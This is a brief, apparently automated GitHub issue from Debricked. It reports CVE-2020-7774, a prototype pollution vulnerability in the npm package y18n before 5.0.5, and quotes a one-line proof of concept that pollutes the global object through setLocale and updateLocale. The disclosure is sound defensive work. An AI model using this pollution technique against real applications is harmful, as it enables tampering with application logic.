A new vulnerability was discovered: CVE-2020-7774
Closed this issue · 0 comments
debricked commented
This affects the package y18n before 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
Read more at Debricked: https://app.debricked.com/en/service/vulnerability/187733